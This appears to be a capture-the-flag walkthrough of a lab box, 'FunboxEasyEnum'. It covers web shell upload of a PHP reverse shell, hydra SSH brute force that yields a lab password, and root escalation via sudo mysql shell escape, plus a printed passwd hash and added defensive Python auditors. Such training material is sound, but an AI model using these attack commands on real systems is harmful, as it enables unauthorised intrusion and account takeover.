FunboxEasyEnum - Easy

Nmap Scan

┌─[sheinn101@parrot]─[~/offsec/FunboxEasyEnum]
└──╼ $ sudo nmap -sC -sV -oN nmap.out 192.168.129.132
Starting Nmap 7.92 ( https://nmap.org ) at 2021-11-06 22:37 +0630
Nmap scan report for 192.168.129.132
Host is up (0.27s latency).
Not shown: 998 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 9c:52:32:5b:8b:f6:38:c7:7f:a1:b7:04:85:49:54:f3 (RSA)
|   256 d6:13:56:06:15:36:24:ad:65:5e:7a:a1:8c:e5:64:f4 (ECDSA)
|_  256 1b:a9:f3:5a:d0:51:83:18:3a:23:dd:c4:a9:be:59:f0 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 39.57 seconds

Directory Scan

[22:40:51] 200 -   11KB - /index.html
[22:40:53] 301 -  323B  - /javascript  ->  http://192.168.129.132/javascript/
[22:41:10] 200 -   13KB - /phpmyadmin/doc/html/index.html
[22:41:11] 301 -  323B  - /phpmyadmin  ->  http://192.168.129.132/phpmyadmin/
[22:41:14] 200 -   10KB - /phpmyadmin/index.php
[22:41:14] 200 -   10KB - /phpmyadmin/
[22:41:19] 200 -   21B  - /robots.txt
[22:41:21] 403 -  280B  - /server-status
[22:41:21] 403 -  280B  - /server-status/
[22:41:21] 403 -  280B  - /mini.php

In robots.txt

In mini.php, we find a web shell that lets us upload files.

Uploading Reverse Shell

On a pentesting Linux distribution such as Parrot, php-reverse-shell.php is already included, so you can find it with this command:

locate php-reverse-shell.php

You can also upload it with curl:

curl -s -F "file=@shell.php" http://IP/mini.php > /dev/null

Once the shell is uploaded, start a listener with nc, then trigger it by visiting the URL or running curl:

curl http://IP/shell.php

From /etc/passwd, we find a user called goat.

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
karla:x:1000:1000:karla:/home/karla:/bin/bash
mysql:x:111:113:MySQL Server,,,:/nonexistent:/bin/false
harry:x:1001:1001:,,,:/home/harry:/bin/bash
sally:x:1002:1002:,,,:/home/sally:/bin/bash
goat:x:1003:1003:,,,:/home/goat:/bin/bash
oracle:$1$|O@GOeN\$PGb9VNu29e9s6dMNJKH/R0:1004:1004:,,,:/home/oracle:/bin/bash
lissy:x:1005:1005::/home/lissy:/bin/sh
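The user enumeration above can be done the same way an auditor would do it. The following is an added example, not part of the original writeup: it parses passwd(5) records, lists the accounts whose shell allows an interactive login (the candidates for the SSH guessing that follows), and flags a configuration problem visible in this very listing, a password hash kept in world-readable /etc/passwd instead of /etc/shadow. The sample data is a constructed subset of the listing; the oracle hash is a placeholder, not the real value.

```python
# Added example (not from the original writeup): parse /etc/passwd, list
# login-capable accounts, and flag misconfigurations visible in passwd alone.
from dataclasses import dataclass
from typing import List

# Constructed sample: a subset of the listing above. The oracle hash is a
# placeholder standing in for a real crypt(3) hash.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
karla:x:1000:1000:karla:/home/karla:/bin/bash
harry:x:1001:1001:,,,:/home/harry:/bin/bash
goat:x:1003:1003:,,,:/home/goat:/bin/bash
oracle:$1$PLACEHOLDER$notarealhash:1004:1004:,,,:/home/oracle:/bin/bash
lissy:x:1005:1005::/home/lissy:/bin/sh
"""

# Shells that refuse an interactive login.
NON_LOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false", "/bin/sync"}


@dataclass
class PasswdEntry:
    name: str
    password: str  # "x" means the hash lives in /etc/shadow
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text: str) -> List[PasswdEntry]:
    """Parse passwd(5) lines; every record has exactly seven colon-separated fields."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, password, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, password, int(uid), int(gid), gecos, home, shell))
    return entries


def interactive_users(entries: List[PasswdEntry]) -> List[str]:
    """Accounts whose shell permits a login: what an attacker, or an auditor, looks at first."""
    return [e.name for e in entries if e.shell not in NON_LOGIN_SHELLS]


def audit_passwd(entries: List[PasswdEntry]) -> List[str]:
    """Flag problems detectable from passwd alone."""
    findings = []
    for e in entries:
        if e.password.startswith("$"):
            # A crypt(3) hash in field 2 is readable by every local user.
            findings.append(
                f"{e.name}: password hash stored in world-readable /etc/passwd; "
                f"move it to /etc/shadow (pwconv)"
            )
        elif e.password == "":
            findings.append(f"{e.name}: empty password field (no password required)")
        if e.uid == 0 and e.name != "root":
            findings.append(f"{e.name}: extra UID 0 account")
    return findings


if __name__ == "__main__":
    parsed = parse_passwd(SAMPLE_PASSWD)
    print("interactive:", ", ".join(interactive_users(parsed)))
    for finding in audit_passwd(parsed):
        print("finding:", finding)
```

Run it against a real file with `parse_passwd(open("/etc/passwd").read())`; on this box the same check would single out the oracle entry.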

Since this is an easy box, we try brute-forcing that user's SSH password with hydra.

SSH Bruteforcing with Hydra

$ hydra -l goat -P /usr/share/wordlists/rockyou.txt $ip ssh

[DATA] attacking ssh://192.168.1.16:22/
[STATUS] 181.00 tries/min, 181 tries in 00:01h, 14344223 to do in 1320:50h, 16 active
[STATUS] 134.67 tries/min, 404 tries in 00:03h, 14344000 to do in 1775:15h, 16 active
[STATUS] 117.29 tries/min, 821 tries in 00:07h, 14343583 to do in 2038:17h, 16 active
[22][ssh] host: 192.168.1.16   login: goat   password: thebest
1 of 1 target successfully completed, 1 valid password found
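From the defender's side, the hydra run above leaves a very recognisable trace in the target's auth.log: a burst of "Failed password" lines from one source, then an "Accepted password" for the same user. The following is an added example, not part of the original writeup, that detects exactly that pattern over constructed Ubuntu-style sshd log lines; the attacker address 192.168.129.5 and the process ids are made up.

```python
# Added example (not from the original writeup): detect SSH password guessing
# in auth.log and note whether the guessing ended in a successful login.
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed sample in Ubuntu syslog format; 192.168.129.5 is a made-up source.
SAMPLE_AUTH_LOG = """\
Nov  6 22:45:01 funbox7 sshd[1201]: Failed password for goat from 192.168.129.5 port 50122 ssh2
Nov  6 22:45:02 funbox7 sshd[1203]: Failed password for invalid user admin from 192.168.129.5 port 50124 ssh2
Nov  6 22:45:02 funbox7 sshd[1205]: Failed password for goat from 192.168.129.5 port 50126 ssh2
Nov  6 22:45:03 funbox7 sshd[1207]: Failed password for goat from 192.168.129.5 port 50128 ssh2
Nov  6 22:45:04 funbox7 sshd[1209]: Failed password for goat from 192.168.129.5 port 50130 ssh2
Nov  6 22:45:05 funbox7 sshd[1211]: Failed password for goat from 192.168.129.5 port 50132 ssh2
Nov  6 22:45:09 funbox7 sshd[1220]: Accepted password for goat from 192.168.129.5 port 50160 ssh2
Nov  6 22:50:00 funbox7 sshd[1300]: Failed password for karla from 10.0.0.7 port 40000 ssh2
Nov  6 22:50:30 funbox7 systemd[1]: Started Session 12 of user goat.
"""

LINE_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d{2}:\d{2}:\d{2}) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>\S+) port \d+"
)

Event = Tuple[datetime, str, str, str]  # (time, "Failed"/"Accepted", user, source ip)


def parse_auth_log(text: str, year: int = 2021) -> List[Event]:
    """Keep only sshd password events; syslog timestamps carry no year, so one is supplied."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%b %d %H:%M:%S").replace(year=year)
        events.append((ts, m["result"], m["user"], m["ip"]))
    return events


def detect_bruteforce(events: List[Event], threshold: int = 5,
                      window: timedelta = timedelta(seconds=60)) -> Dict[str, dict]:
    """Alert on every source IP with >= threshold failures inside any sliding window,
    and record whether that IP logged in successfully after the guessing began."""
    by_ip = defaultdict(list)
    for ev in events:
        by_ip[ev[3]].append(ev)
    alerts = {}
    for ip, evs in by_ip.items():
        evs.sort(key=lambda e: e[0])
        fails = [e for e in evs if e[1] == "Failed"]
        burst, start = False, 0
        for end in range(len(fails)):
            while fails[end][0] - fails[start][0] > window:
                start += 1
            if end - start + 1 >= threshold:
                burst = True
                break
        if not burst:
            continue
        first_fail = fails[0][0]
        success = next((e[2] for e in evs if e[1] == "Accepted" and e[0] >= first_fail), None)
        alerts[ip] = {
            "failures": len(fails),
            "users": sorted({e[2] for e in fails}),
            "success_after_burst": success,  # user whose account was opened, or None
        }
    return alerts


if __name__ == "__main__":
    for ip, info in detect_bruteforce(parse_auth_log(SAMPLE_AUTH_LOG)).items():
        print(ip, info)
```

The single karla failure from 10.0.0.7 stays below the threshold and is not reported, while the burst from 192.168.129.5 is reported together with the goat login that followed it. A dictionary wordlist at a few hundred tries per minute is what made this box fall; key-only authentication, a tool such as fail2ban acting on the same log lines, and a lower sshd `MaxAuthTries` all cut that off.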

Now that we have goat's password, we switch to that user.

www-data@funbox7:/$ su - goat
Password: thebest

goat@funbox7:~$ whoami;id
goat
uid=1003(goat) gid=1003(goat) groups=1003(goat),111(ssh)

Privilege Escalation

Always try sudo -l first; here we see that mysql can be run as root without a password.

goat@funbox7:~$ sudo -l
Matching Defaults entries for goat on funbox7:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User goat may run the following commands on funbox7:
    (root) NOPASSWD: /usr/bin/mysql

Type these commands to get a shell as root:

goat@funbox7:~$ sudo mysql -s
mysql> system bash
root@funbox7:~# whoami;id
root
uid=0(root) gid=0(root) groups=0(root)

You can also use this one-line command from GTFOBins:

sudo mysql -e '\! /bin/sh'
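The root cause here is a sudoers rule that hands a shell-capable client to an unprivileged user. The following is an added example, not part of the original writeup, that parses `sudo -l` output like the one above and flags rules granting root to a binary with a built-in shell escape. The denylist is a short illustrative subset; GTFOBins, which the writeup cites, is the full reference. The `/usr/bin/id` rule in the sample is constructed as a harmless comparison.

```python
# Added example (not from the original writeup): audit `sudo -l` output for
# root-level rules on binaries that can spawn a shell.
import os
import re
from dataclasses import dataclass
from typing import List, Set

# Constructed sample: the sudo -l output above plus one harmless made-up rule.
SAMPLE_SUDO_L = """\
Matching Defaults entries for goat on funbox7:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin\\:/snap/bin

User goat may run the following commands on funbox7:
    (root) NOPASSWD: /usr/bin/mysql
    (root) /usr/bin/id
"""

# Illustrative subset of binaries with documented shell escapes (see GTFOBins).
SHELL_ESCAPE_BINARIES = {"mysql", "vi", "vim", "less", "more", "find", "awk",
                         "python", "python3", "perl", "bash", "sh"}

HEADER_RE = re.compile(r"^User (?P<user>\S+) may run the following commands on ")
# "(runas) [TAG: ...] cmd[, cmd ...]" as printed by sudo -l
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")


@dataclass
class SudoRule:
    user: str
    runas: str
    tags: Set[str]
    command: str


def parse_sudo_l(text: str) -> List[SudoRule]:
    """Extract one SudoRule per command listed under the 'User ... may run' header."""
    rules, user = [], None
    for line in text.splitlines():
        h = HEADER_RE.match(line)
        if h:
            user = h["user"]
            continue
        if user is None:
            continue  # still inside the Defaults section
        m = RULE_RE.match(line)
        if not m:
            continue
        tags = {t.strip() for t in m["tags"].split(":") if t.strip()}
        for cmd in m["cmds"].split(","):
            if cmd.strip():
                rules.append(SudoRule(user, m["runas"].strip(), tags, cmd.strip()))
    return rules


def audit_sudo(rules: List[SudoRule]) -> List[str]:
    """Report root-level rules that are equivalent to an unrestricted root shell."""
    findings = []
    for r in rules:
        if r.runas.split(":")[0].strip() not in ("root", "ALL"):
            continue
        how = "without a password" if "NOPASSWD" in r.tags else "with the user's own password"
        if r.command == "ALL":
            findings.append(f"HIGH {r.user}: may run any command as root {how}")
            continue
        binary = os.path.basename(r.command.split()[0])
        if binary in SHELL_ESCAPE_BINARIES:
            findings.append(
                f"HIGH {r.user}: {r.command} as root {how}; {binary} can spawn a shell, "
                f"so this equals full root. Replace it with a wrapper script that takes "
                f"fixed arguments, or drop the rule"
            )
    return findings


if __name__ == "__main__":
    for finding in audit_sudo(parse_sudo_l(SAMPLE_SUDO_L)):
        print(finding)
```

The mysql rule is reported; the id rule is not. The fix on a real system is to stop granting the interactive client at all: if goat genuinely needs a database task run as root, sudo should point at a wrapper script that performs that one task with fixed arguments, and the audit above would then pass.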

Now we pwned it
